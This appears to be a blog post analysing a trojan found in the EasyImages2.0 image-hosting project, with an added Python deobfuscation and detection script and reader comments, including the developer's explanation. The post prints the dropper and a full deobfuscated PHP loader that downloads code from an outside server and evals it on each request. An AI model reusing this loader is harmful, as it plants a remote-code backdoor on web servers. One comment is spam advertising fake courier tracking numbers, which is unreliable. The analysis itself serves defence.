
(Fixed) EasyImages project suspected of being compromised: analysis of the trojan file

Update, April 17

The developer has confirmed that their local machine was infected; the git repository has been rolled back and the trojan file removed, so the project can be used with confidence again.


A friend who uses the EasyImages project (https://github.com/icret/EasyImages2.0) reported that, in the most recent update, antivirus software flagged a file as a trojan. An issue has already been filed on the project as a warning, but no reply has been received yet.

The file in question is public/static/fonts/fontawesome-wmebfont.php

Source file (the base64 payload inside the string has been omitted here)

<?php
$password='CQtlsC';
$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'...')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/*));.'<linkrel="stylesheet"href="$#css"/>';*/

Decoded and restored. The dot-joined fragments spell out @eval(gzinflate(base64_decode(...))) once the "#html" marker is stripped by preg_replace, and "Q3JlYXRlX0Z1bmN0aW9u" is base64 for "Create_Function", which is then called with that string to define and immediately run the code below:

<?php
$password='CQtlsC';
error_reporting(0);                 // suppress any errors so nothing shows up in the page or logs
session_start();
if (!isset($_SESSION["phpapi"])) {  // the second stage is fetched once per session and then cached
   $c = '';
   $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
   $url = 'http://phpapi.info/404.gif';   // remote server; the "image" is really the encoded payload
   $urlNew= '/0OliakTHisP8hp0adph9papi5+r6eci0a8yijmg9oxcp9ckvhf/';  // marker that must appear in the download
   if (function_exists('fsockopen')) {  // download attempt 1: hand-written HTTP/1.0 request over a raw socket
       $link = parse_url($url);
       $query = $link['path'];
       $host = strtolower($link['host']);
       $fp = fsockopen($host, 80, $errno, $errstr, 10);
       if ($fp) {
           $out = "GET /{$query} HTTP/1.0\n";
           $out .= "Host: {$host}\n";
           $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\n";
           $out .= "Connection: Close\n\n";
           fwrite($fp, $out);
           $inheader = 1;
           $contents = "";
           while (!feof($fp)) {
               $line = fgets($fp, 4096);
               if ($inheader == 0) {       // everything after the header block is the body
                   $contents .= $line;
               }
               if ($inheader && ($line == "\n" || $line == "\n")) {  // blank line ends the headers (both operands read "\n" as decoded)
                   $inheader = 0;
               }
           }
           fclose($fp);
           $c = $contents;
       }
   }
   if (!strpos($c, $urlNew) && function_exists('curl_init') && function_exists('curl_exec')) {  // attempt 2: cURL
       $ch = curl_init();
       curl_setopt($ch, CURLOPT_URL, $url);
       curl_setopt($ch, CURLOPT_TIMEOUT, 15);
       curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
       curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
       $c = curl_exec($ch);
       curl_close($ch);
   }
   if (!strpos($c, $urlNew) && ini_get('allow_url_fopen')) {  // attempt 3: URL wrappers via file() / file_get_contents()
       $temps = @file($url);
       if (!empty($temps))
           $c = @implode('', $temps);
       if (!strpos($c, "delDirAndFile"))
           $c = @file_get_contents($url);
   }
   if (strpos($c, $urlNew) !== false) {   // marker found: strip it, decode, and cache the PHP source in the session
       $c = str_replace($urlNew, "", $c);
       $_SESSION["phpapi"] = gzinflate(base64_decode($c));
   }
}
if (isset($_SESSION["phpapi"])) {       // on every request, execute whatever the remote server supplied
   eval($_SESSION["phpapi"]);
}
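As an added illustration (not part of the original post or of the EasyImages project), the Python script below peels the string-building layer of a dropper shaped like the source file above: it collapses the dot-joined fragments, decodes base64_decode() literals that turn out to be plain function names (exposing Create_Function), applies the preg_replace marker removal, and then flags the eval(gzinflate(base64_decode())) pattern. The sample is constructed with a placeholder payload, and the literal parser deliberately ignores escape sequences.

```python
import base64
import re

# Constructed sample in the shape of the dropper above (not the real file): the base64 payload is a placeholder.
SAMPLE = (
    "<?php $password='CQtlsC';"
    "$html='$password'.'='.\"'\".$password.\"';\".'@e#html'.''.'v'.\"\".'a'.'l('.'g'.'z'"
    ".'i'.'n'.'f'.'l'.'a'.'t'.'e(b'.'as'.'e'.'6'.'4_'.'d'.'e'.'c'.'o'.'d'.'e'.'('"
    ".\"'PAYLOAD_PLACEHOLDER')));\";"
    '$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");'
    '$style=$css(\'\',preg_replace("/#html/","",$html));$style();'
)

LITERAL = r'''(?:'[^']*'|"[^"]*")'''          # one PHP string literal (escape sequences not handled)
CHAIN = re.compile(rf"{LITERAL}(?:\s*\.\s*{LITERAL})+")
B64CALL = re.compile(r"""base64_decode\(\s*(["'])([A-Za-z0-9+/=]+)\1\s*\)""")
STRIP = re.compile(r'preg_replace\("/([^/"]+)/",\s*"",')

def collapse_concat(src: str) -> str:
    """Merge runs of dot-joined literals ('e'.''.'v'.'al') into one literal."""
    def merge(m):
        parts = re.findall(LITERAL, m.group(0))
        return "'" + "".join(p[1:-1] for p in parts) + "'"
    return CHAIN.sub(merge, src)

def reveal_base64(src: str) -> str:
    """Replace base64_decode('...') with its plaintext when it decodes to printable ASCII (e.g. a function name)."""
    def decode(m):
        try:
            text = base64.b64decode(m.group(2), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
        return repr(text) if text.isprintable() else m.group(0)
    return B64CALL.sub(decode, src)

def apply_marker_removal(src: str) -> str:
    """Emulate preg_replace("/marker/","",...): the marker exists only to split keywords."""
    for marker in STRIP.findall(src):      # marker treated as literal text, not as a regex
        src = src.replace(marker, "")
    return src

INDICATORS = {
    "eval_of_inflated_base64": re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode", re.I),
    "create_function_by_name": re.compile(r"create_function", re.I),
}

def analyze(src: str) -> dict:
    """Peel the string-building layer and report which backdoor traits it exposes."""
    decoded = apply_marker_removal(reveal_base64(collapse_concat(src)))
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"decoded": decoded, "indicators": hits}
```

Running analyze() over every .php file under a web root is a cheap first pass; the "decoded" text is what a reviewer should read before trusting a hit or a miss.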


5 comments

  1. j5d j5d

    Buy order numbers, buy courier tracking numbers, buy empty parcels, drop-shipping: choose Aicha www.aickd.com

  2. Bumping this hard....

  3. I've found the cause: I was using a cracked Sublime Text 3, which led to the trojan infection. I sincerely apologize.
    Previously I always pushed updates from my own server and rarely updated git (for details see: https://img.545141.com/).
    This update was mainly to support PHP 7.4 and above (2.0.2.0 previously did not support 7.4);
    I deeply apologize for the problems this caused!

    That said, this trojan is very old; it cannot run on PHP 7.2 or above.

    I tested it myself and could not get it to run on PHP 7.0 either.

    1. Syc Syc

      The web shell uses the create_function function, which has been abolished in newer versions. Users on older versions (PHP 5.x) are also just taking their chances: one-click bundles like LNMP generally put this function on the disabled list as well.

      1. Then it should be fine, since I couldn't get it to run on my older version either...
